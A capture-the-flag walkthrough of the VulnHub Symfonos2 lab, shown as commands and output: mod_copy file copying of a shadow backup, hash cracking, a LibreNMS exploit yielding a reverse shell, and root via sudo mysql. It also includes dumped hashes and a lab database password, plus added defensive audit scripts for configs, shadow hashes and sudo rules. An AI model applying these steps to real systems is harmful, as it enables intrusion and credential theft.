VulnHub Symfonos2
29 May, 2021
Machine Link: https://www.vulnhub.com/entry/symfonos-2,331/
Beginning with an nmap scan:
$ sudo nmap -A -sC -sV -O -p 1-20000 192.168.56.120
Starting Nmap 7.91 ( https://nmap.org )
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.120
Host is up (0.0011s latency).
Not shown: 19995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 9d:f8:5f:87:20:e5:8c:fa:68:47:7d:71:62:08:ad:b9 (RSA)
| 256 04:2a:bb:06:56:ea:d1:93:1c:d2:78:0a:00:46:9d:85 (ECDSA)
|_ 256 28:ad:ac:dc:7e:2a:1c:f6:4c:6b:47:f2:d6:22:5b:52 (ED25519)
80/tcp open http WebFS httpd 1.21
|_http-server-header: webfs/1.21
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 08:00:27:5B:FA:39 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: SYMFONOS2; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 7h09m58s, deviation: 2h53m12s, median: 5h29m58s
|_nbstat: NetBIOS name: SYMFONOS2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.5.16-Debian)
| Computer name: symfonos2
| NetBIOS computer name: SYMFONOS2\x00
| Domain name: \x00
| FQDN: symfonos2
|_ System time: 2021-05-28T05:21:34-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-28T10:21:34
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 1.06 ms 192.168.56.120
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.22 seconds
I started with SMB; here's some output from enum4linux:
===========================================
| Share Enumeration on 192.168.56.120 |
===========================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk
IPC$ IPC IPC Service (Samba 4.5.16-Debian)
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 192.168.56.120
//192.168.56.120/print$ Mapping: DENIED, Listing: N/A
//192.168.56.120/anonymous Mapping: OK, Listing: OK
//192.168.56.120/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\aeolus (Local User)
S-1-22-1-1001 Unix User\cronus (Local User)
Using smbclient:
# smbclient --no-pass //192.168.56.120/anonymous
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jul 18 10:30:09 2019
.. D 0 Thu Jul 18 10:29:08 2019
backups D 0 Thu Jul 18 10:25:17 2019
19728000 blocks of size 1024. 16314080 blocks available
smb: \> cd backups
smb: \backups\> ls
. D 0 Thu Jul 18 10:25:17 2019
.. D 0 Thu Jul 18 10:30:09 2019
log.txt N 11394 Thu Jul 18 10:25:16 2019
19728000 blocks of size 1024. 16314080 blocks available
smb: \backups\> get log.txt
getting file \backups\log.txt of size 11394 as log.txt (397.4 KiloBytes/sec) (average 397.4 KiloBytes/sec)
log.txt was pretty long; here are the noticeable bits that I found:
root@symfonos2:~# cat /etc/shadow > /var/backups/shadow.bak
root@symfonos2:~# cat /etc/samba/smb.conf
[anonymous]
path = /home/aeolus/share
browseable = yes
read only = yes
guest ok = yes
root@symfonos2:~# cat /usr/local/etc/proftpd.conf
<Anonymous ~ftp>
User ftp
Group ftp
# We want clients to be able to login with "anonymous" as well as "ftp"
UserAlias anonymous ftp
# Limit the maximum number of anonymous logins
MaxClients 10
# We want 'welcome.msg' displayed at login, and '.message' displayed
# in each newly chdired directory.
#DisplayLogin welcome.msg
#DisplayChdir .message
# Limit WRITE everywhere in the anonymous chroot
<Limit WRITE>
DenyAll
</Limit>
</Anonymous>
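The two fragments above are the whole problem in miniature: a home-directory share that Samba serves to guests, and an anonymous ProFTPD 1.3.5 block whose only restriction is on WRITE. The SITE CPFR/CPTO commands used later in this writeup come from ProFTPD's mod_copy, and a `<Limit WRITE>` does not cover them. As an added example (my own script, not from the writeup or from either project), the following audit parses smb.conf for guest-accessible shares and checks whether a proftpd.conf denies the copy commands anywhere. The configuration strings are constructed from the quoted fragments; the `SITE_CPFR`/`SITE_CPTO` limit names are taken from mod_copy's documentation and should be confirmed against the installed version. Because the writeup shows the copy succeeding without a completed login, on 1.3.5 the durable fix is a patched ProFTPD; the limit check is defence in depth.

```python
"""Audit Samba and ProFTPD configuration text for the two exposures the
Symfonos 2 log.txt revealed: a guest-readable SMB share and an anonymous
FTP server that does not deny mod_copy's SITE CPFR/CPTO commands.

Added example, not part of the writeup. The configuration strings are
constructed from the fragments quoted in log.txt plus a [global] and a
[print$] section so the parser has something to skip."""
import configparser
import re

SMB_CONF = """\
[global]
workgroup = WORKGROUP

[print$]
path = /var/lib/samba/printers
browseable = yes

[anonymous]
path = /home/aeolus/share
browseable = yes
read only = yes
guest ok = yes
"""

PROFTPD_CONF = """\
<Anonymous ~ftp>
  User ftp
  Group ftp
  UserAlias anonymous ftp
  MaxClients 10
  <Limit WRITE>
    DenyAll
  </Limit>
</Anonymous>
"""

# The <Limit> names mod_copy registers for its two commands; a DenyAll on
# both blocks them for everyone (assumption: mirrors the mod_copy docs,
# verify against the installed version).
COPY_COMMANDS = {"SITE_CPFR", "SITE_CPTO"}

ANON_BLOCK = re.compile(r"<Anonymous\s+([^>]*)>(.*?)</Anonymous>", re.S | re.I)
LIMIT_BLOCK = re.compile(r"<Limit\s+([^>]+)>(.*?)</Limit>", re.S | re.I)


def guest_shares(smb_conf: str) -> list[tuple[str, str]]:
    """Return (share, path) for every non-global share that allows guests.
    Samba accepts 'public' as a synonym for 'guest ok', so both are checked."""
    cp = configparser.ConfigParser(strict=False, interpolation=None)
    cp.read_string(smb_conf)
    found = []
    for share in cp.sections():
        if share.lower() == "global":
            continue
        public = cp.get(share, "public", fallback="no")
        guest = cp.get(share, "guest ok", fallback=public)
        if guest.strip().lower() in ("yes", "true", "1"):
            found.append((share, cp.get(share, "path", fallback="")))
    return found


def anonymous_blocks(proftpd_conf: str) -> list[str]:
    """Return the root argument of each <Anonymous> block (e.g. '~ftp')."""
    return [root.strip() for root, _ in ANON_BLOCK.findall(proftpd_conf)]


def copy_commands_denied(proftpd_conf: str) -> bool:
    """True when some <Limit> with DenyAll covers both SITE_CPFR and SITE_CPTO.
    <Limit WRITE> does not count: the writeup shows cpto succeeding under
    exactly that limit, because the copy is a SITE command, not a STOR."""
    denied = set()
    for names, body in LIMIT_BLOCK.findall(proftpd_conf):
        if re.search(r"^\s*DenyAll\b", body, re.M | re.I):
            denied.update(n.upper() for n in names.split())
    return COPY_COMMANDS <= denied


def audit(smb_conf: str, proftpd_conf: str) -> dict:
    """Combine the checks into one report a hardening script can act on."""
    return {
        "guest_shares": guest_shares(smb_conf),
        "anonymous_ftp": anonymous_blocks(proftpd_conf),
        "copy_commands_denied": copy_commands_denied(proftpd_conf),
    }


if __name__ == "__main__":
    for key, value in audit(SMB_CONF, PROFTPD_CONF).items():
        print(f"{key}: {value}")
```

Run against the constructed text it reports the `anonymous` share at `/home/aeolus/share`, one anonymous FTP root (`~ftp`) and `copy_commands_denied: False`; appending a `<Limit SITE_CPFR SITE_CPTO>` block with `DenyAll` flips the last finding.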
When I tried anonymous login on FTP, it said:
# ftp 192.168.56.120
Connected to 192.168.56.120.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.56.120]
Name (192.168.56.120:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
The website was another dead end; just like Symfonos 1, it had only an image.
So by this point I thought I had gathered all the information the open ports had to offer and was stuck. The pieces were already there: the log showed that a backup of /etc/shadow was kept at /var/backups/shadow.bak, and /home/aeolus/share was readable anonymously over SMB, so if the backup could be copied into the share it could be read. What I wasn't aware of was that even without knowing the FTP password I could still move files around on the system, using the FTP SITE command:
# ftp 192.168.56.120
ftp> site cpfr /var/backups/shadow.bak
350 File or directory exists, ready for destination name
ftp> site cpto /home/aeolus/share/shadow.bak
250 Copy successful
# smbclient --no-pass //192.168.56.120/anonymous
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri May 28 14:31:57 2021
.. D 0 Thu Jul 18 10:29:08 2019
backups D 0 Thu Jul 18 10:25:17 2019
shadow.bak N 1173 Fri May 28 14:31:57 2021
19728000 blocks of size 1024. 16312084 blocks available
smb: \> get shadow.bak
getting file \shadow.bak of size 1173 as shadow.bak (190.9 KiloBytes/sec) (average 190.9 KiloBytes/sec)
# cat shadow.bak
root:$6$VTftENaZ$ggY84BSFETwhissv0N6mt2VaQN9k6/HzwwmTtVkDtTbCbqofFO8MVW.IcOKIzuI07m36uy9.565qelr/beHer.:18095:0:99999:7:::
daemon:*:18095:0:99999:7:::
bin:*:18095:0:99999:7:::
sys:*:18095:0:99999:7:::
sync:*:18095:0:99999:7:::
games:*:18095:0:99999:7:::
man:*:18095:0:99999:7:::
lp:*:18095:0:99999:7:::
mail:*:18095:0:99999:7:::
news:*:18095:0:99999:7:::
uucp:*:18095:0:99999:7:::
proxy:*:18095:0:99999:7:::
www-data:*:18095:0:99999:7:::
backup:*:18095:0:99999:7:::
list:*:18095:0:99999:7:::
irc:*:18095:0:99999:7:::
gnats:*:18095:0:99999:7:::
nobody:*:18095:0:99999:7:::
systemd-timesync:*:18095:0:99999:7:::
systemd-network:*:18095:0:99999:7:::
systemd-resolve:*:18095:0:99999:7:::
systemd-bus-proxy:*:18095:0:99999:7:::
_apt:*:18095:0:99999:7:::
Debian-exim:!:18095:0:99999:7:::
messagebus:*:18095:0:99999:7:::
sshd:*:18095:0:99999:7:::
aeolus:$6$dgjUjE.Y$G.dJZCM8.zKmJc9t4iiK9d723/bQ5kE1ux7ucBoAgOsTbaKmp.0iCljaobCntN3nCxsk4DLMy0qTn8ODPlmLG.:18095:0:99999:7:::
cronus:$6$wOmUfiZO$WajhRWpZyuHbjAbtPDQnR3oVQeEKtZtYYElWomv9xZLOhz7ALkHUT2Wp6cFFg1uLCq49SYel5goXroJ0SxU3D/:18095:0:99999:7:::
mysql:!:18095:0:99999:7:::
Debian-snmp:!:18095:0:99999:7:::
librenms:!:18095::::::
# john pass --wordlist=rockyou.txt
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sergioteamo (?)
Session completed
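john cracked that hash because it is sha512crypt at the default cost (the "Cost 1 (iteration count) is 5000" line above) protecting a wordlist password. The following script is an added example (mine, not from the writeup) of the audit a defender would run over a shadow file: it parses each entry, separates locked and empty accounts from hashed ones, extracts the algorithm, salt and round count from the `$6$` prefix, converts the last-change day count to a date, and lists the accounts that are either passwordless or hashed at the default rounds. `SAMPLE_SHADOW` is constructed to match the layout above: the salts copy the writeup's, the hash bodies are filler of the right length rather than real crypt output, and the `nopass` and `rounds=` entries are invented to exercise those branches.

```python
"""Parse /etc/shadow-format lines and report, per account, whether it is
locked, has an empty password, or carries a hash, and for hashes which
algorithm and cost were used.

Added example, not part of the writeup. SAMPLE_SHADOW is constructed: the
hash bodies are filler characters of the right length, not real crypt
output, and the day counts copy the writeup's 18095."""
import re
from datetime import date, timedelta

ALGORITHMS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt"}
DEFAULT_ROUNDS = 5000  # crypt(3) default for sha256crypt/sha512crypt when no rounds= is given

SAMPLE_SHADOW = (
    "root:$6$VTftENaZ$" + "A" * 86 + ":18095:0:99999:7:::\n"
    "daemon:*:18095:0:99999:7:::\n"
    "Debian-exim:!:18095:0:99999:7:::\n"
    "aeolus:$6$dgjUjE.Y$" + "B" * 86 + ":18095:0:99999:7:::\n"
    "cronus:$6$rounds=656000$wOmUfiZO$" + "C" * 86 + ":18095:0:99999:7:::\n"
    "nopass::18095:0:99999:7:::\n"
    "librenms:!:18095::::::\n"
)

# $id$[rounds=N$]salt$hash, the crypt(5) layout used by md5crypt/sha*crypt
CRYPT_RE = re.compile(r"^\$([^$]+)\$(?:rounds=(\d+)\$)?([^$]*)\$(.+)$")
EPOCH = date(1970, 1, 1)


def classify(pw_field: str) -> dict:
    """Interpret the second shadow field."""
    if pw_field == "":
        return {"state": "empty"}      # no password required at all
    if pw_field[0] in "*!":
        return {"state": "locked"}     # '*' never set, '!' locked (also '!' before a hash)
    m = CRYPT_RE.match(pw_field)
    if not m:
        return {"state": "hashed", "algorithm": "descrypt-or-unknown", "rounds": None}
    ident, rounds, salt, _ = m.groups()
    default = DEFAULT_ROUNDS if ident in ("5", "6") else None
    return {
        "state": "hashed",
        "algorithm": ALGORITHMS.get(ident, f"${ident}$"),
        "rounds": int(rounds) if rounds else default,
        "salt": salt,
    }


def audit_shadow(text: str) -> list[dict]:
    """One dict per well-formed line; shadow(5) defines exactly nine fields."""
    entries = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 9:
            continue
        name, pw, lastchg = fields[0], fields[1], fields[2]
        entry = {"name": name, **classify(pw)}
        # field 3 is days since the epoch; empty on entries like the librenms one
        entry["last_change"] = (EPOCH + timedelta(days=int(lastchg))).isoformat() if lastchg else None
        entries.append(entry)
    return entries


def weak_accounts(entries: list[dict]) -> list[str]:
    """Accounts with no password, an md5crypt hash, or a sha*crypt hash at default cost."""
    weak = []
    for e in entries:
        if e["state"] == "empty":
            weak.append(e["name"])
        elif e["state"] == "hashed" and (
            e.get("algorithm") == "md5crypt"
            or (e.get("rounds") is not None and e["rounds"] <= DEFAULT_ROUNDS)
        ):
            weak.append(e["name"])
    return weak


if __name__ == "__main__":
    found = audit_shadow(SAMPLE_SHADOW)
    for e in found:
        print(e)
    print("weak:", weak_accounts(found))
```

Day 18095 resolves to 2019-07-18, the same date the share listing above shows for the box's files, so every password on it dates from the build. Raising the cost with `rounds=` (the constructed `cronus` entry) or switching to a slower algorithm is the mitigation the `weak_accounts` list points at; keeping a copy of the shadow file in a location another service can reach is the separate mistake this box is built around.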
I was able to log in as aeolus through SSH:
aeolus@symfonos2:~$ id
uid=1000(aeolus) gid=1000(aeolus) groups=1000(aeolus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
aeolus@symfonos2:~$ whoami
aeolus
cronus is running Apache listening on port 8080, serving LibreNMS:
cronus 2010 0.0 1.3 410524 10472 ? S 06:25 0:00 /usr/sbin/apache2 -k start
cronus 2011 0.0 1.3 410524 10472 ? S 06:25 0:00 /usr/sbin/apache2 -k start
cronus 2012 0.0 1.3 410524 10472 ? S 06:25 0:00 /usr/sbin/apache2 -k start
cronus 2013 0.0 1.3 410524 10472 ? S 06:25 0:00 /usr/sbin/apache2 -k start
cronus 2014 0.0 1.3 410524 10472 ? S 06:25 0:00 /usr/sbin/apache2 -k start
aeolus@symfonos2:/etc/apache2$ cat ports.conf
# If you just change the port or add more ports here, you will likely also
# have to change the VirtualHost statement in
# /etc/apache2/sites-enabled/000-default.conf
Listen 127.0.0.1:8080
<IfModule ssl_module>
Listen 443
</IfModule>
<IfModule mod_gnutls.c>
Listen 443
</IfModule>
aeolus@symfonos2:~$ cd /etc/apache2/sites-enabled/
aeolus@symfonos2:/etc/apache2/sites-enabled$ ls
librenms.conf
aeolus@symfonos2:/etc/apache2/sites-enabled$ cat librenms.conf
<VirtualHost 127.0.0.1:8080>
DocumentRoot /opt/librenms/html/
ServerName localhost
AllowEncodedSlashes NoDecode
<Directory "/opt/librenms/html/">
Require all granted
AllowOverride All
Options FollowSymLinks MultiViews
</Directory>
</VirtualHost>
Since the site was listening only on localhost instead of 0.0.0.0, I had to use port forwarding to visit it. aeolus' credentials got me in. There are authenticated exploits available for LibreNMS:
$ searchsploit librenms
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
LibreNMS - addhost Command Injection (Metasploit) | linux/remote/46970.rb
LibreNMS - Collectd Command Injection (Metasploit) | linux/remote/47375.rb
LibreNMS 1.46 - 'addhost' Remote Code Execution | php/webapps/47044.py
LibreNMS 1.46 - 'search' SQL Injection | multiple/webapps/48453.txt
LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection | multiple/webapps/49246.py
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
I tried the third one and was able to get a reverse shell as cronus:
$ nc -vlnp 4242
listening on [any] 4242 ...
connect to [192.168.56.103] from (UNKNOWN) [192.168.56.120] 47542
/bin/sh: 0: can't access tty; job control turned off
$ whoami
cronus
$ id
uid=1001(cronus) gid=1001(cronus) groups=1001(cronus),999(librenms)
Found database credentials being used by LibreNMS:
$config['db_user'] = 'librenms';
$config['db_pass'] = 'VLby8dGg4rvw33sg';
I couldn't find anything interesting in the database; the only user was aeolus.
Apparently cronus was allowed to run mysql through sudo without a password:
cronus@symfonos2:/opt/librenms$ sudo -l
sudo -l
Matching Defaults entries for cronus on symfonos2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User cronus may run the following commands on symfonos2:
(root) NOPASSWD: /usr/bin/mysql
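That one line is the finding a sudoers review should catch before anyone reaches this point: mysql is an interactive client with a built-in way to run other programs, so `(root) NOPASSWD: /usr/bin/mysql` is a root shell with extra steps. As an added example (my own code, not the writeup's), the script below parses `sudo -l` output into rules and flags the ones that grant root through a program with such an escape, through `ALL`, or through wildcard arguments. `SUDO_L_OUTPUT` is constructed: the first rule copies the one above, the other two are invented to show a rule that passes and an unrestricted one. The `SHELL_ESCAPE` set is a starting list of commonly documented cases, not an exhaustive one.

```python
"""Parse the output of `sudo -l` and flag rules that hand out root through
a program with a built-in way to run other commands, which is what the
(root) NOPASSWD: /usr/bin/mysql rule does via mysql's `system`.

Added example, not from the writeup. SUDO_L_OUTPUT is constructed: the
first rule copies the writeup, the other two are made up."""
import re
from pathlib import PurePosixPath

SUDO_L_OUTPUT = r"""Matching Defaults entries for cronus on symfonos2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User cronus may run the following commands on symfonos2:
    (root) NOPASSWD: /usr/bin/mysql
    (root) /usr/bin/systemctl restart apache2
    (ALL) NOPASSWD: ALL
"""

# Programs that can execute an arbitrary command from inside an interactive
# session (mysql's `system` is the one the writeup uses); extend for your fleet.
SHELL_ESCAPE = {"mysql", "vim", "vi", "less", "more", "man", "find"}

# "(runas) TAG: TAG: command, command" as printed by sudo -l
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text: str) -> list[dict]:
    """One dict per command spec: runas user, NOPASSWD flag, full spec, program."""
    rules = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue                                   # Defaults lines and headers
        runas = m["runas"].split(":")[0].strip()       # "(root : root)" -> root
        tags = {t.rstrip(":") for t in m["tags"].split()}
        for spec in m["cmds"].split(", "):
            spec = spec.strip()
            rules.append({
                "runas": runas,
                "nopasswd": "NOPASSWD" in tags,
                "command": spec,
                "program": spec.split()[0],
            })
    return rules


def risky_rules(rules: list[dict]) -> list[tuple[str, bool, list[str]]]:
    """(command, nopasswd, reasons) for rules that amount to a root shell."""
    out = []
    for r in rules:
        if r["runas"] not in ("root", "ALL"):
            continue
        reasons = []
        name = PurePosixPath(r["program"]).name
        if r["program"] == "ALL":
            reasons.append("unrestricted command list")
        elif name in SHELL_ESCAPE:
            reasons.append(f"{name} can run arbitrary commands from inside the tool")
        if "*" in r["command"]:
            reasons.append("wildcard in arguments")
        if reasons:
            out.append((r["command"], r["nopasswd"], reasons))
    return out


if __name__ == "__main__":
    for command, nopasswd, reasons in risky_rules(parse_sudo_l(SUDO_L_OUTPUT)):
        tag = "NOPASSWD " if nopasswd else ""
        print(f"{tag}{command}: {'; '.join(reasons)}")
```

On the constructed input it flags the mysql rule and the `ALL` rule and passes the fixed-argument systemctl one. If a task genuinely needs root access to the database, the fix is a wrapper script with fixed arguments listed in sudoers, never the interactive client itself.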
cronus@symfonos2:/opt/librenms$ sudo /usr/bin/mysql
sudo /usr/bin/mysql
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 34
Server version: 10.1.38-MariaDB-0+deb9u1 Debian 9.8
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> system id
system id
uid=0(root) gid=0(root) groups=0(root)
MariaDB [(none)]> system /bin/bash
system /bin/bash
root@symfonos2:/opt/librenms# whoami
whoami
root
root@symfonos2:/opt/librenms# id
id
uid=0(root) gid=0(root) groups=0(root)
root@symfonos2:/opt/librenms# ls /root
ls /root
proof.txt
root@symfonos2:/opt/librenms# cd /root/
cd /root/
root@symfonos2:~# cat proof.txt
cat proof.txt
Congrats on rooting symfonos:2!
, ,
,-`{-`/
,-~ , \ {-~~-,
,~ , ,`,-~~-,`,
,` , { { } } }/
; ,--/`\ \ / / }/ /,/
; ,-./ \ \ { { ( /,; ,/ ,/
; / ` } } `, `-`-.___ / `, ,/ `,/
\| ,`,` `~.___,---} / ,`,,/ ,`,;
` { { __ / ,`/ ,`,;
/ \ \ _,`, `{ `,{ `,`;`
{ } } /~\ .-:::-. (--, ;\ `,} `,`;
\\._./ / /` , \ ,:::::::::, `~; \},/ `,`; ,-=-
`-..-` /. ` .\_ ;:::::::::::; __,{ `/ `,`; {
/ , ~ . ^ `~`\:::::::::::<<~>-,,`, `-, ``,_ }
/~~ . ` . ~ , .`~~\:::::::; _-~ ;__, `,-`
/`\ /~, . ~ , ' ` , .` \::::;` <<<~``` ``-,,__ ;
/` .`\ /` . ^ , ~ , . ` . ~\~ \\, `,__
/ ` , ,`\. ` ~ , ^ , ` ~ . . ``~~~`, `-`--, \
/ , ~ . ~ \ , ` . ^ ` , . ^ . , ` .`-,___,---,__ ``
/` ` . ~ . ` `\ ` ~ , . , ` , . ~ ^ , . ~ , .`~---,___
/` . ` , . ~ , \ ` ~ , . ^ , ~ . ` , ~ . ^ , ~ . `-,
Contact me via Twitter @zayotic to give feedback!